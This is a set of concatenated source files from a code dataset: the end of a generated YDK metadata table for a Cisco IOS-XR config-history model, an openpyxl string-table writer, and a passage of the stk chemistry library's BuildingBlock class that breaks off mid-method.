''',\n 'config_type',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('operation', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Operation\n ''',\n 'operation',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'oir-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.ShutdownInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.ShutdownInfo',\n False, \n [\n _MetaInfoClassMember('comment', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Comment\n ''',\n 'comment',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'shutdown-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.StartupInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.StartupInfo',\n False, \n [\n _MetaInfoClassMember('boot-path', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Boot Path\n ''',\n 'boot_path',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('how-booted', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' How Booted\n ''',\n 'how_booted',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'startup-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.BackupInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.BackupInfo',\n False, \n [\n _MetaInfoClassMember('comment', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Comment\n ''',\n 'comment',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'backup-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info',\n False, \n [\n _MetaInfoClassMember('a', ATTRIBUTE, 'int' , None, None, \n [('0', '4294967295')], [], \n ''' B\n ''',\n 'a',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('alarm-info', REFERENCE_CLASS, 'AlarmInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.AlarmInfo', \n [], [], \n ''' alarm info\n ''',\n 'alarm_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('backup-info', REFERENCE_CLASS, 'BackupInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.BackupInfo', \n [], [], \n ''' backup info\n ''',\n 'backup_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('cfscheck-info', REFERENCE_CLASS, 'CfscheckInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.CfscheckInfo', \n [], [], \n ''' cfscheck info\n ''',\n 'cfscheck_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('commit-info', REFERENCE_CLASS, 'CommitInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.CommitInfo', \n [], [], \n ''' commit info\n ''',\n 'commit_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('oir-info', REFERENCE_CLASS, 'OirInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.OirInfo', \n [], [], \n ''' oir info\n ''',\n 'oir_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('shutdown-info', REFERENCE_CLASS, 'ShutdownInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.ShutdownInfo', \n [], [], \n ''' shutdown info\n ''',\n 'shutdown_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('startup-info', REFERENCE_CLASS, 'StartupInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.StartupInfo', \n [], [], \n ''' startup info\n ''',\n 'startup_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'HistRecordEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'HistRecordEnum', \n [], [], \n ''' type\n ''',\n 'type',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record',\n False, \n [\n _MetaInfoClassMember('record', ATTRIBUTE, 'int' , None, None, \n [('-2147483648', '2147483647')], [], \n ''' Record\n ''',\n 'record',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', True),\n _MetaInfoClassMember('info', REFERENCE_CLASS, 'Info' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info', \n [], [], \n ''' Content of the history\n ''',\n 'info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('record-type', REFERENCE_ENUM_CLASS, 'HistRecordEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'HistRecordEnum', \n [], [], \n ''' Record type\n ''',\n 'record_type',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('timestamp', ATTRIBUTE, 'int' , None, None, \n [('0', '4294967295')], [], \n ''' Time stamp for the history\n ''',\n 'timestamp',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'record',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType',\n False, \n [\n _MetaInfoClassMember('record-type', ATTRIBUTE, 'str' , None, None, \n [], ['[\\\\w\\\\-\\\\.:,_@#%$\\\\+=\\\\|;]+'], \n ''' Record type\n ''',\n 'record_type',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', True),\n _MetaInfoClassMember('record', REFERENCE_LIST, 'Record' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record', \n [], [], \n ''' History summary information for a specific type\n of history\n ''',\n 'record',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'record-type',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl',\n False, \n [\n _MetaInfoClassMember('record-type', REFERENCE_LIST, 'RecordType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType', \n [], [], \n ''' History summary information for a specific type\n of history\n ''',\n 'record_type',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'cfg-hist-gl',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n}\n_meta_table['CfgHistGl.RecordType.Record.Info.AlarmInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.CfscheckInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.CommitInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.OirInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.ShutdownInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.StartupInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.BackupInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record']['meta_info'].parent =_meta_table['CfgHistGl.RecordType']['meta_info']\n_meta_table['CfgHistGl.RecordType']['meta_info'].parent =_meta_table['CfgHistGl']['meta_info']\n"} {"ext": "py", "sha": "1a2f4274d7daac60ae99f57319b933b10c1b479f", "content": "from __future__ import absolute_import\n# Copyright (c) 2010-2018 openpyxl\n\n\"\"\"Write the shared string table.\"\"\"\nfrom io import BytesIO\n\n# package imports\nfrom openpyxl2.xml.constants import SHEET_MAIN_NS\nfrom openpyxl2.xml.functions import Element, xmlfile, SubElement\n\nPRESERVE_SPACE = '{%s}space' % \"http://www.w3.org/XML/1998/namespace\"\n\ndef write_string_table(string_table):\n \"\"\"Write the string table xml.\"\"\"\n out = BytesIO()\n\n with xmlfile(out) as xf:\n with xf.element(\"sst\", xmlns=SHEET_MAIN_NS, uniqueCount=\"%d\" % len(string_table)):\n\n for key in string_table:\n el = Element('si')\n text = SubElement(el, 't')\n text.text = key\n if key.strip() != key:\n text.set(PRESERVE_SPACE, 'preserve')\n xf.write(el)\n\n return out.getvalue()\n"} {"ext": "py", "sha": "1a2f43964d70308be0f37bdf681a3903a890565b", "content": "\"\"\"\nBuilding Block\n==============\n\n\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\nimport os\nimport typing\nimport warnings\nfrom collections.abc import Collection\nfrom functools import partial\n\nimport numpy as np\nimport rdkit.Chem.AllChem as rdkit\nimport vabene\n\nfrom ...utilities import OneOrMany, flatten, remake\nfrom ..atoms import Atom\nfrom ..bonds import Bond\nfrom ..functional_groups import FunctionalGroup, FunctionalGroupFactory\nfrom .molecule import Molecule\n\nlogger = logging.getLogger(__name__)\n\n\nclass BuildingBlock(Molecule):\n \"\"\"\n Represents a building block of a :class:`.ConstructedMolecule`.\n\n A :class:`BuildingBlock` can represent either an entire molecule or\n a molecular fragments used to construct a\n :class:`.ConstructedMolecule`. The building block uses\n :class:`.FunctionalGroup` instances to identify which atoms are\n modified during construction.\n\n \"\"\"\n\n # Maps file extensions to functions which can be used to\n # create an rdkit molecule from that file type.\n _init_funcs = {\n '.mol': partial(\n rdkit.MolFromMolFile,\n sanitize=False,\n removeHs=False\n ),\n\n '.sdf': partial(\n rdkit.MolFromMolFile,\n sanitize=False,\n removeHs=False\n ),\n\n '.pdb': partial(\n rdkit.MolFromPDBFile,\n sanitize=False,\n removeHs=False,\n proximityBonding=False,\n ),\n }\n\n _placer_ids: frozenset[int]\n _core_ids: frozenset[int]\n\n def __init__(\n self,\n smiles: str,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n position_matrix: typing.Optional[np.ndarray] = None,\n ) -> None:\n \"\"\"\n Initialize a :class:`.BuildingBlock`.\n\n Notes:\n\n The molecule is given 3D coordinates with\n :func:`rdkit.ETKDGv2`.\n\n Parameters:\n\n smiles:\n A SMILES string of the molecule.\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n position_matrix:\n The position matrix the building block should use. If\n ``None``, :func:`rdkit.ETKDGv2` will be used to\n calculate it.\n\n Raises:\n\n :class:`RuntimeError`\n If embedding the molecule fails.\n\n \"\"\"\n\n molecule = rdkit.AddHs(rdkit.MolFromSmiles(smiles))\n if position_matrix is None:\n params = rdkit.ETKDGv2()\n random_seed = 4\n params.randomSeed = random_seed\n if rdkit.EmbedMolecule(molecule, params) == -1:\n raise RuntimeError(\n f'Embedding with seed value of {random_seed} '\n 'failed.'\n )\n rdkit.Kekulize(molecule)\n else:\n # Make sure the position matrix always holds floats.\n position_matrix = np.array(\n position_matrix,\n dtype=np.float64,\n )\n conformer = rdkit.Conformer(molecule.GetNumAtoms())\n for atom_id, position in enumerate(position_matrix):\n conformer.SetAtomPosition(atom_id, position)\n molecule.AddConformer(conformer)\n\n self._init_from_rdkit_mol(\n molecule=molecule,\n functional_groups=functional_groups,\n placer_ids=placer_ids,\n )\n\n @classmethod\n def init_from_molecule(\n cls,\n molecule: Molecule,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n ) -> BuildingBlock:\n \"\"\"\n Initialize from a :class:`.Molecule`.\n\n Parameters:\n\n molecule:\n The molecule to initialize from.\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the\n building block, different *placer* ids will be used by\n the building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n Returns:\n\n The building block. It will have the same atoms, bonds and\n atomic positions as `molecule`.\n\n \"\"\"\n\n return cls.init(\n atoms=tuple(molecule.get_atoms()),\n bonds=tuple(molecule.get_bonds()),\n position_matrix=molecule.get_position_matrix(),\n functional_groups=functional_groups,\n placer_ids=placer_ids,\n )\n\n @classmethod\n def init_from_vabene_molecule(\n cls,\n molecule: vabene.Molecule,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n position_matrix: typing.Optional[np.ndarray] = None,\n ) -> BuildingBlock:\n \"\"\"\n Initialize from a :mod:`vabene.Molecule`.\n\n Notes:\n\n The molecule is given 3D coordinates with\n :func:`rdkit.ETKDGv2()`.\n\n Parameters:\n\n molecule:\n The :class:`vabene.Molecule` from which to initialize.\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n position_matrix:\n The position matrix the building block should use. If\n ``None``, :func:`rdkit.ETKDGv2` will be used to\n calculate it.\n\n Returns:\n\n The building block.\n\n Raises:\n\n :class:`RuntimeError`\n If embedding the molecule fails.\n\n \"\"\"\n\n editable = rdkit.EditableMol(rdkit.Mol())\n for atom in molecule.get_atoms():\n rdkit_atom = rdkit.Atom(atom.get_atomic_number())\n rdkit_atom.SetFormalCharge(atom.get_charge())\n editable.AddAtom(rdkit_atom)\n\n for bond in molecule.get_bonds():\n editable.AddBond(\n beginAtomIdx=bond.get_atom1_id(),\n endAtomIdx=bond.get_atom2_id(),\n order=rdkit.BondType(bond.get_order()),\n )\n\n rdkit_molecule = editable.GetMol()\n rdkit.SanitizeMol(rdkit_molecule)\n rdkit_molecule = rdkit.AddHs(rdkit_molecule)\n\n if position_matrix is None:\n params = rdkit.ETKDGv2()\n random_seed = 4\n params.randomSeed = random_seed\n if rdkit.EmbedMolecule(rdkit_molecule, params) == -1:\n raise RuntimeError(\n f'Embedding with seed value of {random_seed} '\n 'failed.'\n )\n else:\n # Make sure the position matrix always holds floats.\n position_matrix = np.array(\n position_matrix,\n dtype=np.float64,\n )\n conformer = rdkit.Conformer(rdkit_molecule.GetNumAtoms())\n for atom_id, position in enumerate(position_matrix):\n conformer.SetAtomPosition(atom_id, position)\n rdkit_molecule.AddConformer(conformer)\n\n rdkit.Kekulize(rdkit_molecule)\n return cls.init_from_rdkit_mol(\n molecule=rdkit_molecule,\n functional_groups=functional_groups,\n placer_ids=placer_ids,\n )\n\n @classmethod\n def init(\n cls,\n atoms: tuple[Atom, ...],\n bonds: tuple[Bond, ...],\n position_matrix: np.ndarray,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n ) -> BuildingBlock:\n \"\"\"\n Initialize a :class:`.BuildingBlock` from its components.\n\n Parameters:\n\n atoms:\n The atoms of the building block.\n\n bonds:\n The bonds of the building block.\n\n position_matrix:\n An ``(n, 3)`` position matrix of the building block.\n\n functional_groups:\n An :class:`iterable` holding the\n :class:`.FunctionalGroup` instances the building block\n should have, and / or :class:`.FunctionalGroupFactory`\n instances used for creating them.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n Returns:\n\n The building block.\n\n \"\"\"\n\n building_block = cls.__new__(cls)\n Molecule.__init__(\n self=building_block,\n atoms=atoms,\n bonds=bonds,\n position_matrix=position_matrix,\n )\n functional_groups = building_block._extract_functional_groups(\n functional_groups=functional_groups,\n )\n building_block._with_functional_groups(functional_groups)\n building_block._placer_ids = (\n building_block._normalize_placer_ids(\n placer_ids=placer_ids,\n functional_groups=building_block._functional_groups,\n )\n )\n building_block._core_ids = frozenset(\n building_block._get_core_ids(\n functional_groups=building_block._functional_groups,\n )\n )\n return building_block\n\n @classmethod\n def init_from_file(\n cls,\n path: str,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n ):\n \"\"\"\n Initialize from a file.\n\n Parameters:\n\n path:\n The path to a molecular structure file. Supported file\n types are:\n\n #. ``.mol``, ``.sdf`` - MDL V3000 MOL file\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n Returns:\n\n The building block.\n\n Raises:\n\n :class:`ValueError`\n If the file type cannot be used for initialization.\n\n \"\"\"\n\n _, extension = os.path.splitext(path)\n\n if extension == '.pdb':\n warnings.warn(\n 'Loading from .pdb files is deprecated and will be '\n 'removed from stk versions released after 1st Nov '\n '2022. Please use .mol files for loading molecules '\n 'instead.',\n category=FutureWarning,\n )\n\n if extension not in cls._init_funcs:\n raise ValueError(\n f'Unable to initialize from \"{extension}\" files.'\n )\n # This remake needs to be here because molecules loaded\n # with rdkit often have issues, because rdkit tries to do\n # bits of structural analysis like stereocenters. Remake\n # gets rid of all this problematic metadata.\n molecule = remake(cls._init_funcs[extension](path))\n\n return cls.init_from_rdkit_mol(\n molecule=molecule,\n functional_groups=functional_groups,\n placer_ids=placer_ids,\n )\n\n @classmethod\n def init_from_rdkit_mol(\n cls,\n molecule: rdkit.Mol,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n ) -> BuildingBlock:\n \"\"\"\n Initialize from an :mod:`rdkit` molecule.\n\n Warnings:\n\n For :mod:`rdkit` molecules with non-integer bond orders,\n such as 1.5, the molecule should be kekulized prior to\n calling this method. Otherwise, all bond orders will be\n set to an integer value in the building block.\n\n Parameters:\n\n molecule:\n The molecule.\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n Returns:\n\n The molecule.\n\n \"\"\"\n\n building_block = cls.__new__(cls)\n building_block._init_from_rdkit_mol(\n molecule=molecule,\n functional_groups=functional_groups,\n placer_ids=placer_ids,\n )\n return building_block\n\n def _init_from_rdkit_mol(\n self,\n molecule: rdkit.Mol,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ],\n placer_ids: typing.Optional[tuple[int, ...]],\n ) -> None:\n \"\"\"\n Initialize from an :mod:`rdkit` molecule.\n\n Parameters:\n\n molecule:\n The molecule.\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n \"\"\"\n\n atoms = tuple(\n Atom(a.GetIdx(), a.GetAtomicNum(), a.GetFormalCharge())\n for a in molecule.GetAtoms()\n )\n bonds = tuple(\n Bond(\n atom1=atoms[b.GetBeginAtomIdx()],\n atom2=atoms[b.GetEndAtomIdx()],\n order=(\n 9 if b.GetBondType() == rdkit.BondType.DATIVE\n else b.GetBondTypeAsDouble()\n )\n )\n for b in molecule.GetBonds()\n )\n position_matrix = molecule.GetConformer().GetPositions()\n\n super().__init__(atoms, bonds, position_matrix)\n self._with_functional_groups(self._extract_functional_groups(\n functional_groups=functional_groups,\n ))\n self._placer_ids = self._normalize_placer_ids(\n placer_ids=placer_ids,\n functional_groups=self._functional_groups,\n )\n self._core_ids = frozenset(self._get_core_ids(\n functional_groups=self._functional_groups,\n ))\n\n def _normalize_placer_ids(\n self,\n placer_ids: typing.Optional[tuple[int, ...]],\n functional_groups: Collection[FunctionalGroup],\n ) -> frozenset[int]:\n \"\"\"\n Get the final *placer* ids.\n\n Parameters:\n\n placer_ids: The ids of *placer* atoms or ``None``.\n\n functional_groups:\n The :class:`.FunctionalGroup` instances of the building\n block.\n\n Returns:\n\n Depending on the input values, this function will return\n different things.\n\n #. `placer_ids` is a :class:`tuple` of :class`int`: the\n `placer_ids` will be returned.\n\n #. `placer_ids` is ``None`` and `functional_groups` is not\n empty: The *placer* ids of the functional groups will\n be returned.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. The ids of all atoms in the building block will\n be returned.\n\n \"\"\"\n\n if placer_ids is not None:\n return frozenset(placer_ids)\n\n if functional_groups:\n return frozenset(flatten(\n functional_group.get_placer_ids()\n for functional_group in functional_groups\n ))\n\n return frozenset(atom.get_id() for atom in self._atoms)\n\n def _get_core_ids(\n self,\n functional_groups: typing.Iterable[FunctionalGroup],\n ) -> typing.Iterator[int]:\n \"\"\"\n Get the final *core* ids.\n\n This method may return duplicate ids.\n\n Parameters:\n\n functional_groups:\n The :class:`.FunctionalGroup` instances of the building\n block.\n\n Yields:\n\n The id of an atom defining the core of the molecule.\n\n \"\"\"\n\n functional_group_atom_ids = {\n atom_id\n for functional_group in functional_groups\n for atom_id in functional_group.get_atom_ids()\n }\n for atom in self._atoms:\n atom_id = atom.get_id()\n if atom_id not in functional_group_atom_ids:\n yield atom_id\n\n for functional_group in functional_groups:\n for atom_id in functional_group.get_core_atom_ids():\n yield atom_id\n\n def _extract_functional_groups(\n self,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ],\n ) -> typing.Iterator[FunctionalGroup]:\n \"\"\"\n Yield functional groups.\n\n The input can be a mixture of :class:`.FunctionalGroup` and\n :class:`.FunctionalGroupFactory`. The output yields\n :class:`.FunctionalGroup` instances only. Either those\n held directly in `functional_groups` or created by the\n factories in `functional_groups`.\n\n Parameters:\n\n functional_groups:\n Can be an :class:`iterable` of both\n :class:`.FunctionalGroup` and\n :class:`.FunctionalGroupFactory`.\n\n Yields:\n\n A functional group from `functional_groups`, or created\n by a factory in `functional_groups`.\n\n \"\"\"\n\n for functional_group in functional_groups:\n if 